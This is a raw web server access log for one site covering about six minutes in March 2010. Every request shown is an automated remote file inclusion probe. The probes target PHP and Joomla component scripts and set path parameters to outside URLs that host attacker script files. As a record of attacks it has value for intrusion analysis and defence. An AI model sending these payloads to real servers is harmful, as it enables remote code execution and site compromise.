94.124.120.61 - - [04/Mar/2010:04:00:19 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:04:00:19 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:04:00:19 -0800] "GET /logs/access_100226.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:22 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:22 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:22 -0800] "GET /logs/access_100226.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:22 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:22 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:23 -0800] "GET /logs/access_100226.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:00:50 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:00:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:04:00:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:57 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:57 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:57 -0800] "GET /logs/access_100226.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:57 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:57 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:00:57 -0800] "GET /logs/access_100226.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:04:01:06 -0800] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.canucksfanz.com/images/imez1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:04:01:06 -0800] "GET /logs/access_100208.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.canucksfanz.com/images/imez1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:04:01:08 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.canucksfanz.com/images/imez1.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:11 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:11 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:12 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:12 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:12 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:12 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:14 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:14 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:14 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:04:01:21 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:04:01:21 -0800] "GET /bad_link.php?theme_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:04:01:21 -0800] "GET /logs/bad_link.php?theme_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:04:01:21 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:01:27 -0800] "GET /logs/administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:01:27 -0800] "GET /logs/access_100211.log%20%20/administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:01:28 -0800] "GET /administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:01:37 -0800] "GET /logs/access_100222.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:37 -0800] "GET /logs/access_100222.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:01:39 -0800] "GET /logs/access_100222.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:04:01:43 -0800] "GET /logs/access_100222.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:01:46 -0800] "GET /logs/administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:01:46 -0800] "GET /administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:01:50 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:01:50 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:01:50 -0800] "GET /logs/access_100226.log/administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:04:02:01 -0800] "GET /logs/access_100218.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.canucksfanz.com/images/imez1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:02:03 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:02:03 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:02:03 -0800] "GET /logs/access_100226.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:02:04 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:02:04 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:02:04 -0800] "GET /logs/access_100226.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:02:05 -0800] "GET /logs/access_100222.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:02:14 -0800] "GET /logs/access_100222.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:02:18 -0800] "GET /logs/access_100222.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:04:02:25 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:04:02:25 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [04/Mar/2010:04:02:28 -0800] "GET /logs/access_100222.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:02:51 -0800] "GET /logs/access_100222.log/administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:02:52 -0800] "GET /pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:02:52 -0800] "GET /logs/access_100224.log%20%20/pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:02:52 -0800] "GET /logs/pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:03:06 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:03:07 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:03:07 -0800] "GET /logs/access_100226.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:03:22 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:03:22 -0800] "GET /logs/access_100226.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:03:22 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:04:03:47 -0800] "GET /logs/access_100222.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:04:30 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:04:30 -0800] "GET /logs/access_100226.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:04:30 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:04:39 -0800] "GET /logs//components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:04:39 -0800] "GET /components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:04:39 -0800] "GET /logs/access_100226.log%20%20//components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:04:45 -0800] "GET /logs/access_100226.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:04:45 -0800] "GET /logs/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:04:45 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:04:46 -0800] "GET /logs/pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:04:46 -0800] "GET /logs/access_100224.log%20%20/pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:04:49 -0800] "GET /logs/access_100222.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:04:04:50 -0800] "GET /pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:04:52 -0800] "GET /logs/access_100224.log%20%20/pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:04:52 -0800] "GET /pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:04:52 -0800] "GET /logs/pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:05:03 -0800] "GET /pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:05:03 -0800] "GET /logs/pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:04:05:04 -0800] "GET /logs/access_100224.log%20%20/pages/pageHeader.php?path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:05:08 -0800] "GET /logs/access_100222.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:05:29 -0800] "GET /logs/access_100222.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:04:05:30 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:04:05:30 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:04:05:30 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:05:52 -0800] "GET /logs/access_100226.log//components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:05:52 -0800] "GET /components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:05:52 -0800] "GET /logs//components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:06:09 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:04:06:10 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:04:06:10 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:04:06:10 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:04:06:12 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:04:06:12 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:04:06:12 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:06:24 -0800] "GET /logs/access_100222.log%20%20/administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:06:37 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [04/Mar/2010:04:06:39 -0800] "GET /logs/access_100222.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:06:41 -0800] "GET /logs/access_100222.log%20%20//components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:06:42 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [04/Mar/2010:04:06:43 -0800] "GET /logs/access_100222.log/administrator/components//com_cpg/cpg.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:06:44 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:06:45 -0800] "GET /logs/access_100213.log/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [04/Mar/2010:04:06:47 -0800] "GET /logs/access_100222.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:06:48 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:06:48 -0800] "GET /logs/access_100213.log/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:06:48 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
